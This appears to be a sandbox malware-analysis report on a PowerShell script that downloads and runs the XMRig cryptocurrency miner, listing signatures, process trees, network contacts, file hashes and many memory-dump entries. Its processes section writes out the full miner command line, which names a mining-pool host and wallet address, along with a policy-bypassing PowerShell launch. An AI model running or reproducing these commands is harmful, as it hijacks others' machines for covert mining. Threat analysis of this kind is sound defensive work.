memory/4936-115-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-116-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-117-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-118-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-119-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-120-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-121-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-122-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-123-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-124-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-125-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-126-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-127-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-128-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-129-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-130-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-131-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-132-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-133-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-134-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-135-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-136-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-137-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-138-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-139-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-140-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-141-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-142-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-143-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-144-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-145-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-146-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-147-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-148-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-149-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-150-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-151-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-152-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-153-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-154-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-155-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
memory/4936-156-0x00007FF64E6A0000-0x00007FF64F2D3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:56
Platform
win11-20240426-en
Max time kernel
1792s
Max time network
1750s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3036 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3036 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3036-0-0x00007FFA379F3000-0x00007FFA379F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_slv5poqe.and.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3036-9-0x0000029B64DB0000-0x0000029B64DD2000-memory.dmp
memory/3036-10-0x00007FFA379F0000-0x00007FFA384B2000-memory.dmp
memory/3036-11-0x00007FFA379F0000-0x00007FFA384B2000-memory.dmp
memory/3036-12-0x00007FFA379F0000-0x00007FFA384B2000-memory.dmp
memory/3036-14-0x0000029B64E40000-0x0000029B64E52000-memory.dmp
memory/3036-15-0x0000029B64E20000-0x0000029B64E2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2200-46-0x0000022519290000-0x00000225192B0000-memory.dmp
memory/2200-47-0x000002251AA90000-0x000002251AAB0000-memory.dmp
memory/2200-48-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/3036-49-0x00007FFA379F3000-0x00007FFA379F5000-memory.dmp
memory/3036-50-0x00007FFA379F0000-0x00007FFA384B2000-memory.dmp
memory/2200-51-0x00000225AD460000-0x00000225AD480000-memory.dmp
memory/2200-52-0x00000225AD690000-0x00000225AD6B0000-memory.dmp
memory/2200-53-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-54-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-55-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-56-0x00000225AD460000-0x00000225AD480000-memory.dmp
memory/2200-57-0x00000225AD690000-0x00000225AD6B0000-memory.dmp
memory/2200-58-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-59-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-60-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-61-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-62-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-63-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-64-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-65-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-66-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-67-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-68-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-69-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-70-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-71-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-72-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-73-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-74-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-75-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-76-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-77-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-78-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-79-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-80-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-81-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-82-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-83-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-84-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-85-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-86-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-87-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-88-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-89-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-90-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-91-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-92-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-93-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-94-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-95-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-96-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-97-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-98-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-99-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-100-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-101-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-102-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-103-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-104-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-105-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-106-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-107-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-108-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-109-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-110-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-111-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-112-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-113-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-114-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-115-0x00007FF733020000-0x00007FF733C53000-memory.dmp
memory/2200-116-0x00007FF733020000-0x00007FF733C53000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 408 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 408 wrote to memory of 3636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.80.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
Files
memory/408-5-0x0000029910C80000-0x0000029910CA2000-memory.dmp
memory/408-6-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-4-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-8-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-10-0x0000029910EA0000-0x0000029910F16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oc0itvdp.0sl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/408-25-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-48-0x0000029910D10000-0x0000029910D22000-memory.dmp
memory/408-61-0x0000029910CD0000-0x0000029910CDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3636-90-0x000001A6733E0000-0x000001A673400000-memory.dmp
memory/3636-91-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/408-92-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/3636-93-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/408-94-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/408-95-0x00007FFAC0A40000-0x00007FFAC0C1B000-memory.dmp
memory/3636-96-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-97-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-98-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-99-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-100-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-101-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-102-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-103-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-104-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-105-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-106-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-107-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-108-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-109-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-110-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-111-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-112-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-113-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-114-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-115-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-116-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-117-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-118-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-119-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-120-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-121-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-122-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-123-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-124-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-125-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-126-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-127-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-128-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-129-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-130-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-131-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-132-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-133-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-134-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-135-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-136-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-137-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-138-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-139-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-140-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-141-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-142-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-143-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-144-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-145-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-146-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-147-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-148-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-149-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-150-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-151-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-152-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-153-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-154-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-155-0x00007FF787550000-0x00007FF788183000-memory.dmp
memory/3636-156-0x00007FF787550000-0x00007FF788183000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
